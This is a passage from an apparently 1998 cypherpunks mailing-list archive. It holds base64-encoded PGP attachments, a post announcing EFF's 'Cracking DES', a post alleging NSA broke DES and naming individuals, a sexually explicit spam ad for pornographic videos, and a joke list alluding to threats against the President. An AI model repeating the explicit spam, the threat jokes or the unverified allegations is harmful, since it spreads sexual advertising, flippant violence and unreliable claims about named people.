ZGFycEorWlJiTUpkSzd5Z3A5YzFYWG4wSVd1DQpEN2FucTJOckV1czYwSDZ1
RkNmRitxUHRueWkyZkZHRnRYZ1VIVnFCeDQxZC9OTXl2dzRJV2YvREoxZG9W
d01wDQpJbGsxNjRCT1p0OVZqL3FzNEpldXhGS3V4Vmt1NVJqZVJyYno3Y2U3
YXE4K0poZ21WNFN2SU45bjQvazBWQzN4DQp2N2VkWUJPQjBneEwvUGVwSXJ0
WTdXWHJGU2lzdnpHWE5lNlVkWS9oTVpEY0c5Z05oYXR6d05INXZxL245MnNU
DQpUWkgyVFMyeDBpZERtVEwvMTNrdW1nd1p5dUpGVTFXZFdhQjRSRjIvZWpY
a1dyaHVLKzdKcnJzVHM0OHhDWHlDDQpldXA5NHBmSDREQXQrZWtXTFVUMUpj
U2ozaC94bmNhTXNOeUdQbDBuZE1rMkZPSU1JTy9mZkc1VTNtbk11S3dnDQpE
VlcvQzBXeENiVXJ3dU9EWkNDYUZEY01SRkJuZXBqcWFYZGJYYzhPY1QveGhh
aEx3N2cxY3Mxc3RzZ1ZhNndVDQpjNnoxcE9kb1BBVWtnd05BT1VoVTZKNi9F
UXQ5VnJBdTNLYzNoTVdPV056a21kUzQrSmk4NzdHZ3JUSlJtR3hEDQpFSUZm
TW5xV2trRm1lcEtkdVl5Yi9Fdm5WTzAwSlJ5enJTT3k5MGROZUNSNjNMcFVy
V0VxQVRLVzQ0ZDBvcGx1DQo2TzIybU5Pd2hQSVlJL1JJOGxlbXFnR3dHMTFu
dVBsb3pPbll4NWxVM2ZFOHpCQWVJMkR6NS91a093ZEZNaThrDQpyVmlVL3gw
bFJNd1F4bll5VXZXSXpDaTNnR0wwOFZzSktqcXFEbmRwNTlFM0FJYUwxRG54
aHgrazcvaVNFKzNrDQpubnc4eEg4RFJkRW15d3VRd1NkRVpxbGJ3dDFESndY
NFJrNGtyb1RFMEcrckpjOVlHVzU0cUtDOFp5emVVUGE0DQo0NmlkSDI0bldl
RkltcUNQTGRZSGJjN25zWncyQjFidGdmaVlyWWNMWDRBS1BmUmZRZW4vRHhK
REpDdnpOdVpYDQp2TTRWNzFpMmcyVWxqb2dUOHdxeS84elE0Q1UzakVwSzVW
Wnc4bmhJaGt4NHFKY1preG5EZm1US0ZuS3ZuaTBxDQphYkJsQmZTS3JvUDQ0
bVE5RGRkeVEvc0ZValh2MnZuUFUwdEdSelNFTTh2LzdObFVVemQzWWZFcW1i
OVR6QU80DQpHSmw1N3J0cTUzQWhUMTFreVdtZjdJT2JsNjV1aTJGRGhRTUEy
RlFNNEkveUZuYVlTZzlBLzA2ZXFYMmVaSE4wDQpZaXdXWWtNUXV1enlUYVBv
K04xZVFpR2lubUZGbWFpS3Z6MFVxV0NDWGhWVkZvbCs5cTExZnRGV3dwMVpR
VXN1DQp6cnlvRGIrcjdUeFptbGFmRUF0QjMvdEljNCtoclZSeXIrNkJpTnQx
VDkzWWZPRjlXSHQyd0lRNzA0QVhGT1I1DQp4YndBUjlQZXVoWC9lN3k1MFBv
SlVXMkg5S2poeGMxb0VBcFdmOEhOMVdvcVVaeUorbUI2NEhHNkwwN0cvWXkv
DQpJQ3BIV05Ya2o0dDU0aitPczhJN0t2RzAzamt2K21ubE1ZSk4vMlNLdXUz
Z0YzbUNnaC9NNWZ1NENFdlNCRGoxDQpraWRlODlJa2ZzSEFoSUVwZGdLckR1
U0cxbHM1RHFPMlFCNnJWL1hNd0FtSEdSTnRaeTAzODM0WlFSYmpwZ1Q4DQpD
bUlmdDl4OTRnWTUwRnNqOVdoQ1o0cmpOU3ROTHZZQTcrS2ZLUG1TSmtneTU2
bzEvd1V3Rlhha3psRHRuZ2xQDQp3bGNLVndQZngxMWFsVU9LM2ZWanhGRWJy
blhBRFVoV3pRUGZEaURYZ3FRSExmeU5lbTdWSFI0T3dKSzRENjkvDQpCZk9o
STFqYWR4a0RPNGlGb0Y0bUlmaTZNdlZCRi83d2ZuQzRnT2lYRFQraWxraDdo
S3NuYnVUSU1tUGJKTSs5DQpDbm5UL1krL2UrYVk0WHRWWndyd3ZrUGlCbW9N
cEJmMlFHYXhReVhKYlNtUDJXV3pTWHFNRVplNUd1VE1TTkw4DQpqbW5LRTFr
M3pQZmVESFZFb1JGQmNRc3E3N0FReDZKaHFtMC9nQW5UVlZabEw2ODI2Z2N0
Zzl3cnVHQno2bkZvDQpLK1pHOVNwbDQ4Wm9XWlh2Z1dkT2pJRlpCdDZ5eWhQ
Qy9YMjlTYUZlNGdISFVKY1JrOUtkRWhMemQ4azNyMTNCDQp0UEU1eFZheUMz
c1BjbXRENU9pRFRGNDlVUGhBVXBwRkZTS1g0dmVGQTJOcGxjSnR0T3d6Rzlk
a1BKSEhOWWtVDQplWGlJZ3FHZUJid1BCMnNGRkdFditJMml2TE1FQTJsMWFZ
RXN6Q1VaQitHSVNnWlV6WDBZVVhnNHIzcXFkUG5FDQpkVU1xZkh4bHljZlAr
d0VDT3J0STBDcWpKTmp4V1hYb1Y5YnlIN1huUGNqTmpYNFJyOWxZMXJsL05q
WU1ERzhjDQp2NFR2U0VkUTg0dUs4eUZBbk5XSFZtb3dCTi9qQ002bm40YUIv
T1JhUkJPeDh6R1RsYVQ5Y2VqUHl1dXhBUHVDDQpjLzRENUFZY3A2VXl1KzJG
SXNPR0g0byt0bVhneEN2dVAvTThuYkVVdHQ5R1ZwOE1UL3VhRTdWRDRZdERX
WElRDQozNVcrZm96bWxHOXZqWHdQdmF4clp5cG91TjFlNkxCTGgxSWdMcnRK
Y2M4blZuREp1RjBMQlZFdElSMzZlZTk1DQovWEhiYzJOWmNWd1hmd3ovQnJn
cmtuTm5DZ2RBTjFkRUVWTENXdUxpSjVjUyttb1RCaG1oeldQbG5nRkdBNmxX
DQpzaGdlbzlUc3VEL25uTFpZVFhnTXJ2YjdWVUdFZkZuVmRCK3FmUGJINzlz
cGNFNVJ4V2pWNXB5RWE3TGNXWmtxDQppVlZ6bDJndGUyV1RURUY1LzNxVjd5
bmYxZW1wMzNMN1crRnRyZlhWODZnZGFQYXUwcnZZQUxGWWFlbjBpUkVCDQpS
eG9SVzZrK2NPcFBMWUZid1FZazJqN1d4ZktKMVMyYmNHVm1xSDA5YUNNdXNT
TkVFZlV6bUJIbHB6dk9WSHVoDQpBYm1QMTdJU0ZGb0lRRGVmdDFDaldkeE1W
RG1XTVNFL3FmK1FHZW5xRWZhT281ckpnbUxtL1I4UnZSbG16cmJhDQorL3BJ
RHhCbVMrb2JFUGZFVnVxVmwyM1dIYVFzcmRNKzJRQXU4M2dvQ3BpT0F1SmMr
Uk42SU9hRlZnaCtNcjBmDQpZanJDU1RQeGN0ZDcxeTFQZGNwTThDWmU4WGRS
NnNmQXZyV25kd084L0hYdVpIeDB4bHdwUzRxNFlUM3htN2RVDQpYSGpWdnBp
ampQUnpVR2k2Um9GYWZ2eHVwc01LQlplMUthZnZsdThCcmFIUjlyT1RlNnVs
SW1OVFRSaHE2Y2ViDQpkL0JWRjQxZnhEckhQU0Q4V2tya3dSVHM4RDZFd2lQ
Y1pDVDlwQzE2VU5GdXU4V2FJZlQyYVQxOTZlSXdXR1BhDQpja3NKQWFxejQv
RWFEOXJJeW5KSVNYT3ZCWEhnR1hPdHVxVWlsUzJCbXJZRmFkeEwwVld3cGtP
eG8zNXJON3FjDQpnYVBjckRITDRiczIrUlpHZzJNYUVCcThXQ3pNT2h0QzZT
eGsvdlR1bml2Z1FPcTA1T2tuSzVnYndDL0h5U2ZWDQpZR0lYZnQ2RlpVYnVq
UURpTStncWhzaHArK2VBQnI2aHNTQ1luNW9ZYXNucy9LVFZPSWgwalJUeWEy
NHRMRHJPDQp3eDhXTVgyT2VNWXBka2I4ZzF6VGFaL1NVMS9Rbk9KbWNHUGs3
ejN4bWM0U0lRRys5RWhOYUJVMWVJUU1FSndVDQppcXlXYnZHRmMyUHdkeVdF
UlJoRnpScDRxdDFiR0tmRXBJK0I4Um5oMEhNZlcra3F3UzhrcGxTSkhpQ2RU
OHhMDQpPR3dkalkxaXVwYWlnSUtkSC9MY2xnaHc1MEVqYWRCS3gwcWxrSkpp
WHdXRXhiNWg1dEdpbVErRWsrOEhvNEpLDQpPODdBZno0TWtkUGd3RmkxMnJj
ejVkNzQzU3NGTVZsL0FPNkdYUWU4enVKUCtxWmM2eTBVYm1BNHhZTFVVRlYz
DQo5WjIwNVNldHhNYkpiNDhkNzBsR2k1b0lMaTFaZllLaWc4UTk2S2ZvelFy
NGNUWENONlZqV1RicVhETXhyMXFaDQpEYTM1Q1VETnlGQkJLNTh5QXFMNXVj
TGEzN3hNbTkzVC82c0d4OEV1VVp2ekxVN0dLUDNDZ1lZRzAweVF6dWMxDQpa
Z0Vid09WaWFBMGhZOEZjVytZMndxcUlnVlpuZEtTQ08vamQ0cGxGdENkVkFH
VkV3MUp1QnZrTUNWT2lRdlV1DQpwWGx5N0hFdFh6Q1g0aWJ4MXZrbGxGQ1BH
UHgyL1dBTmRyOVg5ZHVUMmhWV3UzVnRWRmQ2d2RESC8wUElKOWVyDQpBVEVM
SFY0MS9sckNzUjQyc3hpYVk3Nkw2cjVKV2VRblNXcTg2S3NOTE5xZHNXcEdT
VHhRbkhqQ1B0QW5MSHplDQo1aFU5aTdheVZzS1hiZ3Q3cW9TcXc5cWRkeVFo
N3QySUYvVTl5YjZCUEV6Q0tMdkU1OFJ2bkNtZll5WmswRjBGDQozTWJnNjNu
VTkrdkxrc09NZTJiR3doSGw3YVhpNCs2UU1sVldCdDRQcDhqZlBJOStsRkdi
ZXJMY3dXT3dqWEpNDQpEdXhkK3crZXZQOWd4S1psRUE9PQ0KPTlMeEwNCi0t
LS0tRU5EIFBHUCBNRVNTQUdFLS0tLS0NCg==
--Boundary..3994.1071713793.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 31 Jul 1998 06:06:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cracking DES 1-4
Message-ID: <199807311306.JAA24187@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We offer Chapters 1-4 of EFF's "Cracking DES:"

     http://jya.com/cracking-des.htm  (110K + 9 images)

URLs to other parts welcomed.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 31 Jul 1998 08:19:05 -0700 (PDT)
To: whitfield diffie <desmedt@cs.uwm.edu
Subject: Cracking DES earlier
Message-ID: <35C1DF28.4B71@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 7/31/98 8:23 AM

John Young

I am reading  parts of http://www.jya.com/cracking-des.htm#foreword.

Bill Goldrick and I talked on the phone several days ago.

Goldrick had been reading about Cracking DES at jya.com.

Goldrick reminded me that in the late 1980s that NSA employee Mark
Unkenholtz told me and others at Sandia that NSA had broken DES.

Unkenholtz is the 'Mark' mentioned at http://jya.com/da/whpda.htm 
Appendix S.

Amy Johnston, cc,  was Mark Unkenholtz's fiancee.  

I faxed the Hern DRAFT letter to her for reason that NSA did not have an
unclassified fax machine readily available.

For those who might want to get Sandia crypto history right   "The First
Ten Years of Public Key Cryptography," Proceedings of the IEEE, 76(5),
May 1988. referenced at  http://www.aci.net/kalliste/nukearse.htm,
Goldrick

1 was supervisor of Mark Schaefer who build the second CTBT seismic data
authenticator
http://jya.com/da/whpda.htm

I used Schaefer's TEMPEST design schematics.

2  supervised deployment of the seismic stations in Hamar Norway.  This
is detailed
in William Burrows book Deep Black.

3  supervised Jim Walkup who was responsible for placing the CTBT data
authenticator
described at  http://jya.com/da/whpda.htm in the field.

                  date: September 11, 1991

                    to: Bill Payne, 9236

                        [Signature]

                  from: James Walkup, 9233


               subject: DSVS authenticator records


4  handled recall of some CLASSIFIED algorithm eprom chips that somehow
made their
way into the field in 3.

NSA believes that the  STEP size and non-linear feedback function are
CLASSIFIED SECRET/NSI. http://jya.com/da/whpda.htm

  The NSA R register feedback function is classified. For each data bit
processed, both the   F and R registers are stepped multiple times. The
number of steps is classified.

But we ALL now know the CLASSIFIED SECRET/NSI value is 31.
http://jya.com/nsasuit.txt

5  rejected NSA employee Donald Simard's  http://jya.com/nsasuit.txt
order to deploy the classified algorithm.

Simard told Goldrick that NSA would DECLASSIFY Benincasa's algorithm
LATER.

Let's all hope for settlement of the unfortunate matter before it gets
WORSE.

I want to revise my book

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

It has been over about 27 years since I directed any Ph.D. students

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html     
http://www.friction-free-economy.com/
http://www.mhpcc.edu/general/john.html

Perhaps I should get back into the business of directing and
participating in Ph.D thesis work?  I have some GREAT Ph.D. thesis topic
ideas in the area of

  FORTH is applicable to hardware intensive projects    
  implemented by one, two, or three workers.  Robots,    
  computer numerical controlled machines, weapons    
  programmers, cryptographic processors, engine    
  controllers, unmanned observatories, computer hardware    
  debuggers, laser printer graphics controllers, video    
  games, work station device drivers, writing BASICs are    
  all candidates for FORTH software technology.  FORTH is    
  a one of the top choices for embedded controller    
  applications.   


Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: beverly357@hotmail.com
Date: Fri, 31 Jul 1998 07:34:16 -0700 (PDT)
Subject: World Record Sex!
Message-ID: <QQfako00572.199807311430@relay5.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Attention!
Warning! Adults Only!                    Warning! Adults Only!

If you are under 21 years of age, or not interested in sexually 
explicit material... please hit your keyboard delete button now
and please excuse the intrusion.  Removal instructions appear
at the end of this email.

Available NOW for only $9.95!  Next 10 Days Only!

WORLD RECORD SEX!

Be There!  See It Now On Video!  Unbelievable ...But True!

You Won't Believe Your Eyes!!!  [As Seen on the Howard Stern Show]

"The World's Biggest Gang Bang"

See sexy  Annabel Chong as she sets the world Gang Bang Record
in this fantastic video documentary that chronicles her 24 hour
sexathon with 251 men engaging in sexual intercourse and oral
sex with her!  Don't worry, you won't have to stay up 24 hours
to watch it all.  We've selected only the most exciting and red
hot scenes for you...all in breathtaking living color with plenty of
extreme close-ups!  This video is guaranteed to knock your socks
off and leave you breathless!  You've never seen anything like it!
Annabel takes on five men at a time!  90 minutes! Order Today!
Only $9.95 plus $3 shipping and handling [Total $12.95].


"GANG BANG II"
The Record Breaker!!!  Starring Jasmin St. Claire!

See Beautiful and Voluptious Jasmin St. Claire shatter Annabel's
gang bang record by taking on 300 men in one 24 hour sex session!
You won't believe your eyes at all the hot firey action that you will
see as the new world record is established before your eyes as
Jasmin  takes on five men at a time for sexual intercourse and
oral sex!  Your friends will break down your door to see this video!
You'll be the most popular guy in town!  The action is truly unreal 
and you will see the best of it in living life-like color!  Order Today
and see Jasmin break the record!  90 minutes.  Only $9.95 plus
$3 shipping and handling [total $12.95].

Also Available...

The Uncensored Authentic Underground...
Pamela Anderson Lee & Tommy Lee
Sex Video Tape!

Everyone is talking about this exciting video!  See Pam and 
Tommy engaging in sexual intercourse and oral sex in the car,
on the boat and much, much more!  A  real collectors video! 30 minutes.
Only $9.95 plus $3 shipping and Handling [total $12.95]

"Tonya Harding Wedding Night Sex Video"
Now see the beautiful Ice Skating Shame of the Olympics
Tonya Harding engaging in sexual intercourse and oral 
sex on her wedding night with husband Jeff Gillooly!
This "Bad Girl" is Hot!  Don't miss this video! 30 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

"Traci...I Love You"  Starring Traci Lords
Now see the most beautiful and popular porn star in her last
adult video before she hit the big time!  It's the blockbuster of
the year...sensual...fiery and exposive!  Traci Lords in her most
erotic and controversial film ever!  Don't Miss It!  90 minutes.
Only $9.95 plus $3 shipping and handling [total $12.95]

EMAIL SPECIAL!

ORDER ANY FOUR VIDEOS AND GET THE FIFTH ONE FREE!!!

Your order will be shipped via First Class Mail. All Shipments in plain unmarked wrapper.
For Priority Mail - Add $5
For Overnight Express - add $15

You can order by Phone, Fax, Mail or Email.

We accept all Major Credit Cards and checks by phone or fax.
Visa - MasterCard - American Express - Discover

10 Day Money Back Guarantee!  We know that you will be pleased with these Videos!

To Email your order - DO NOT HIT REPLY ON YOUR KEYBOARD

Send email to our special email address below:

quickstudy@juno.com

[Note: If you order by email and do not receive an email acknowledgement within 24 hours, please phone our office at
718-287-3800]

Phone our office 9am to 10 pm [eastern time]

[718] 287-3800 to Order By Phone for FASTEST SERVICE!

 We can accept your credit card or check by phone

Fax Your Order 24 hours per day  to  [718] 462-5920
You can fax your credit card information or your check

Order by mail by sending $12.95 per video,  cash, check, money order or major credit card [Visa, MasterCard, American Express or Discover] to

TCPS, INC.
4718  18th Ave.  Suite 135
Brooklyn, NY 11204

Make Checks & Money Orders Payable to TCPS, Inc.
New York State Residents Please Add 85 cents for Sales Tax per Video!

You must be over 21 years of age to order and give us your date of birth with your order!

The Following Order Form is for Your Convenience!

.............................................................................................................




Please ship me the following video tape[s]!

Qty___________Annabel Chong "World's Biggest Gang Bang"

Qty__________"Gang Bang II" Jasmin St. Claire

Qty___________"Pamela & Tommy Lee Sex Video Tape"

Qty_________   "Tonya Harding Wedding Night Sex Video Tape"

Qty__________"Traci I Love You" Traci Lords

at $9.95 each plus $3.00 for shipping and handling per tape
[$12.95 per video or "SPECIAL $51.80 for ALL FIVE"!

Credit Card #______________________________Exp Date___

I hereby represent that I am over 21 years of age.  
My date of birth is_________________________________

Signature______________________________________________

Ship to:  Name_______________________________________

Address____________________________________________

City________________________State___________Zip________

Area Code and Home Phone  [    ]___________________________

Fax # [     ]______________________________________________

Email Address___________________________________________

To remove your name from our mailing list, send us an email with 
remove in the subject line.  This is a one time offer and you should not hear from us again!

FOREIGN ORDERS -Add $15us if you desire Air Parcel Post Shipment.  We ship all over the world.

By deleting your unwanted E-Mail you waste one keystroke, yet
by throwing away paper mail you waste our planet!  SAVE THE
TREES and support internet E-Mail instead of paper mail!

[C] Copyright TCPS 1998














































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Fri, 31 Jul 1998 10:45:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CC - SAHMD / Password: convectionalencryption
Message-ID: <TCPSMTP.18.7.31.11.35.4.2847582152.1142317@fhouse.org>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3994.1071713793.multipart/mixed"

--Boundary..3994.1071713793.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 
COCK1.ASC


--Boundary..3994.1071713793.multipart/mixed
Content-Type: application/octet-stream; name="bin00003.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00003.bin"
Content-Description: ""

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tDQpWZXJzaW9uOiAyLjYuMg0K
DQpwZ0FBQ1JGamVoTStzTUQ3dUt6c3pKbVc4eWw4TTUrcGZaRHpEUEdXVWdU
RjkzYmMxSUd0TE1ZQ1p1VmxsMzNlDQpia3g3aFdmb1hmUDdaS1gzVXVmMlhs
SEdBZ1NESmRKQ2ZGRXN1aUtqQkk1RkRmdElFYVZ2OTk5enJyWW8wVXJRDQpa
NzZ6UHR5UmpvSmFoVjhYZ2pPTXlxR2RYbEppcjNrK0RMaERLMUhqNm1MK2FK
aEpRNXBsMkQ0T08xazdVeFRGDQpLSzhJbjBiZkNtU1M0NnhBTnFJMUFjM2Zm
cUY3YWMzTXJ3dFFFVDhmSWRlWDhPUXoyUjFkckhqRVhxdWdKNnJGDQpoRE1k
WTc0SkNnNm45L3Iyd054cFBBdzJ6NnhIZStTd2xEMEhMU3hLQUpWWG9oM0l0
R3RsQVZ3U0RaQXo0NHgzDQpyNml1SlJCeXNRSEVFVS9zZjFqcE5FV2lkSmla
TitzcHo4WVU4R2lqVDRyQmlwU2lLNVdsdmowQzYvakc5UExhDQpFWkhuR0E1
NVY0SnRjQTVEMEVoY1krKzRFd05sQzJtRE9VekkxeFJLb1lNOFBhbk9YQU5u
bnlQK1VxRHpLVE9jDQpYbEEyN2h5akdqNnVvOUxPM2MxZEZYZklOQVMySWRK
cUpCb3VIbDJnQTQwd0FXZVpPTVlrRlhPT0hJVCtSU1MrDQpndGtCSmFJT0Ja
MWtLN3ROb2F4S1VsdUcrTExtZDl3OE41ZU1GMitjbTBBS2xwa1E2WjNCdEx1
TjBXYlJwWEpkDQpUY0ZJZXFCaUxQeEI3TlJ4aklzcThyYXY3cUtrNll5eGVq
UCtPNW5aeTJOTFlWMW0wTlV0cjc4b1UwRDNQZVRVDQpZY0diTUY4RkxiWXZU
V0l0aG5vQUN0Y0liSjRkN2JORXBQT09UUDZVK2ZWMFNZYjBpWFRJamRadHcx
N0NGQjJPDQptYlRHbEhoY2VSTWtoUzVFUUdENTBSdTlZSG5hTWp0R1lTdDJv
eStURWtZeStVWlMwTHV1YVlvbUlrMTFBamRkDQp0SGh2ZjNOcyswVlpUbldM
YjFrZUR2SUwySFlma0FMcFc4U2F5K1owcC92b0thRTBpVW1rZmRYWkhxNE1L
VE9PDQp5YjcvMlpocWpFaDFubnZZeERrODJqTTdxcCtCYVluekVBZ1Z0eXNX
RUgvQWYwcE42aHpCQkE2UW9DZ1lGMlhnDQpwWTRnK3JuNGxvMkJmVWZZTHlY
SkhESldzQ1BqM0haMVZIRE1zQWlFQ2dNWno0dVRUMzJJOTB2Q0Nyek16aGhI
DQpYNXltUFk4OGY1bVo2OTA5UmljMTdlSklWWTNpYWlDMFlaMllKUnp3MkN0
V0twQTd1MWZENUU4TnFRdVNPeG1wDQpMZ1VQZkhXdUNLalp6blMrdFFPL0dO
cTZmU0JEMDhGTWN4Q1BtaWszTDRkZ3BUeDZrOGxKRGQwVi83aWFpcFNJDQpr
dGdtUDNUZ3NhNFdzUy9nUmxobU9jK2ZRM045N0pKZjJpdXJ0OXlsdzdqZW1j
V3ZJTFB6dXZaSnYrNitPYlpNDQpQcS8vaEJMZ0hDclRua0FZblVZbzZjbmlI
TDlBZUM3OXJ2YUcrWGc5L3VubC9ibDVpNnVsc21hT0VXaVJEK3RMDQpDcnJ4
czJveHFPa0ltckMrb2U1cU5OWVZTS2xpU2tPMTBZODdDUGM5U3hLbXRIV2JC
LzBFd0J2OVF6Q3BHSjd5DQo2cWFibDc1aWVlekYwUzUyV2grc1pHTlAvS1lE
N21HRTZVYXhPL0d5cmxhdmEyQ3dUYjg4TzRVVWFVZG9NMlhNDQpKVlo5Zjha
c0l3aWpRRDNWcTFsRVJkS1VibDF6MmJEVTJIQllOaXZPRGRUdkJ6QUhyeFJt
VmEwVnRBR21xc25oDQpYZTNzc1ozU28wSjRlQlB4MzdkajMvaFlyNTN4RUQv
eFNrVEpTK1BoSGhvOEJUNm4xQ3QxQTRNMXVvMWZFYkhRDQpDaHlhZ1RvSjR5
cnBGOVpkaWJ1djA0eHh0ODQrU3VQcE9SRVI4cGlWa3lDZlZOdFcwYlJiOFhG
Y3hYYTBiOXZCDQpESEg1U01JQ3NncFdBYkdOWUcwMmsyK1A1WXNVRSt6UDEr
cnUzUzRTWTJ5djlGOXBFc3U2R1Irb0VRMndGZnVnDQpnSFBUb0dJMUpOaGhn
cUNCNVNmRTZzSUo1cGo4amNBUTYrNXN1MFM1c1FtM0JUQjArQ2xKVnBTc3RJ
WldPVm1yDQpFWVZranZFdDhEdEloUGtpVjBwUFoyblJYTzA5bXVrUTUraDhm
ejFYU1ZYdVZhVCs2VVBJREVBbk52ck5mMHl2DQpEbWViOVRJc0NFdHpFVTNB
NGorbkRLRnl5K3VoQThWeW5qYW9NZ2RiVW10SXZkTTlNQVcyWHNBNVhrMk9O
TWtHDQpIZlN4WmtYemdDV29YUys5QTJiWFJPRXBQc0IweDFTUWgwcmRTNEVq
RnJDU3llZ3JwU0MrSE5vODZZT1VWR3ZlDQpLR0YxdXZrOEZBeUNYTHpkcFNx
WkljY1NFSGwrUGNMcnpKY2VuaUMvYm9CSFRHblRqYlJHWDF5eUl1a05vL251
DQpsZ0hmMXIxK0UwYWtPRFdXVjFMN0hPd25NdzR6c2JJS2g0U3FlRlVuQUNp
R1NkOVptVk1kS3JhWG5vSEV1TWlMDQptRjFkWFp4UGM2ampaS1Rrc1p0cm90
TVgrWTh0UnluYzhrdVJmUDJXUzlsaitxRXhOV3MzK3FSYktqSm1nSXBvDQpr
SnRjNE1CVkppQnVRdHhEVzl5VHdvditvVlpZVzd0Qkp3UW1yVWRXTGRQd0hF
QjlTKzFnYmNYeUQyaERBOWp5DQptaVVjV0lMMnhXdDNwZGdvNmsrZktrQS80
MlFjYmtJc1RZSUVjSHNKNzhRMFNqa1g1UUlvM2RJOEFyOTRWN0tHDQpzbThO
aHJscDBSVDZLSWlTcVIreUJTaHpZaC83WGZwMCtrcmlsNWsxS2YxOWk1RS9W
bDloazNxN2dySXNHZ0dzDQplbHhZNHdFVFdQRGtFRDhLRkpoWmh5eUt4Ymhv
MnFuM3RuRXowTzdUUnBDaUtKSk4rQWdHNHo3clRIN0hoRXh4DQp2MUlBWmw0
eUVvaGJQemczVzROYzlrTTJ0Wk1ocFlhblFCWnpmVHBjYnBHNmpqemVzcGdQ
MTdUYXZkYVZyb1Z1DQpXd1A1cTBHemxVbElDR0RRZW5mdkNqcFBiY2lTdytV
UXlRNlVqUC91U0NFUG5kdENzaDZ3UlUrZlJDeFhPTzY2DQo4RVhlNkx5bC9J
WFcwaWNUWkNlaDFUZ1pVMXNRaUFjRWVGT1RqVWxMU2w4aDlGQTZvby8zZm1U
RjZNV1pVSzhLDQpJWkVmcEJaSC9DeExUMHVtRHZFc2huQTlBTnBiWEtHSHYz
b3kwMWlLalFIV3RlSTNadHpIRHltVHlEcHpjbjJIDQpDajlCYXhOWmp3Skkx
NkRCRElId2xCa1Izc3I4bWVWaU5XMWNBMTJrNVdKYjkzR24wQmpjdHgwUkxP
cDhQNTY4DQpyTkRnb2NaV2pSNkFjazJKRDBnOFBBV2czUXY2SEcrVE9mRzZ0
K3BTTFhCa3EyRm1qbVIwempiZVhpN2h6ZmlPDQpHVjVGQ0Q2b2toSGZTeXRT
Z0RWYWpSREJCbTV6aEZ3ZUJaendpdnJmNDdzR2xIRm9kOGdnOEZaMzVxUGRH
bVFLDQpPalVNNElDbHB0bHIzNWRNRHI3UG8vbms1OTU5QkZRQVNwN01jeWdy
V1NnKzh3b2ZSU3NtMXZYMXdQR0hBaHZ0DQpIeHBhNUg4b2ZoQnQvbkZ4REdy
R1orSVFoU0pSZWtiWHRFQjh5WDVMbUJEWHFaZ0Ezc3FEbGNmdGZmMGF6Mjkx
DQpNaFRQVjN6aU4yTVJPZGNMREJyRHFTRGk5RFl1c3p4WjBWRC8reHRndXow
dWlLSVNpakdDeExSVE9OVHlpTm9NDQpZSmpHZWNYV1JJalVvWFVWZ1VmZzNn
UWZRQXlxeXdYaEJPQWppRWNGWE5PU2tWTzhVTDlSVll4cmRoM2MzQWtKDQps
bzBONngrRU9jcSt5dnl1RjRWZVkrUFNtQ0N6cE5xNWttSFZuMlA5WmVPeFQ2
WnQwNjBuRjNmaVFSUzM0K2k1DQp6bmNLL01SWUtBTE90WjBqbWNZbXUvOW9U
dWNvY3c9PQ0KPVZtYmoNCi0tLS0tRU5EIFBHUCBNRVNTQUdFLS0tLS0NCg==
--Boundary..3994.1071713793.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Fri, 31 Jul 1998 10:58:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Secret Service With A Smile - SAHMD!!!
Message-ID: <TCPSMTP.18.7.31.11.47.52.2847582152.1142319@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain


The 'Secret Service With A Smile' chapter of SPACE ALIENS HIDE MY
DRUGS!!! 
was sent to the CypherPunks Disturbed Male LISP as secret.as1 -->
secret.as7
earlier today. It is a DOS .prn file, which is the only type of copy I
could save
with the FAX software I am using.
I was forced to delete the original text file from the computer I was
using, but 
the Secret Service has copies of it, so anyone who wishes the original
text
file can contact:

United States Secret Service
Jeremy A.C. Sheridan
Special Agent
300 West Congress, Room 4V
Tucson, AZ 85701
Phone 520-670-4730
Fax 520-670-4826

Toto
~~~~
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Fri, 31 Jul 1998 11:07:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Top Ten - SAHMD!!!
Message-ID: <TCPSMTP.18.7.31.11.56.20.2847582152.1142325@fhouse.org>
MIME-Version: 1.0
Content-Type: text/plain


Top Ten Things You Don't Want To Tell
 The Secret Service When They Visit
 _____________________________
SPACE ALIENS HIDE MY DRUGS!!!

10.  You're here about the VOICES, aren't you?
    They *told* me you were coming...

9. Look, pal, I don't even know who the President *was*...
  I mean...*is*...
  Uuhhh...is it 10:15 in DC yet?

8. Do either of you guys know where the 'yellow' wire goes?

7. The First Lady's butt looks pretty good through a 'scope', eh?

6. You must have me confused with my brother, MadDog...the *good* son...

5. Could you put this around my forearm, give it a twist, and then pull
   it really tight?
   Hey, don't bump the spoon!

4. *Which* death threat? Unless you're going to be more specific,
   you're just wasting my time and yours.

3. 'One Bullet, One Vote' bumperstickers are meant as *humor*?
   You're schitting me, right?

2. Next time you're guarding the President at a White House speech,
   do you think you could stand just a tad further to the left?

1. "Cuckoo-Cuckoo"
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





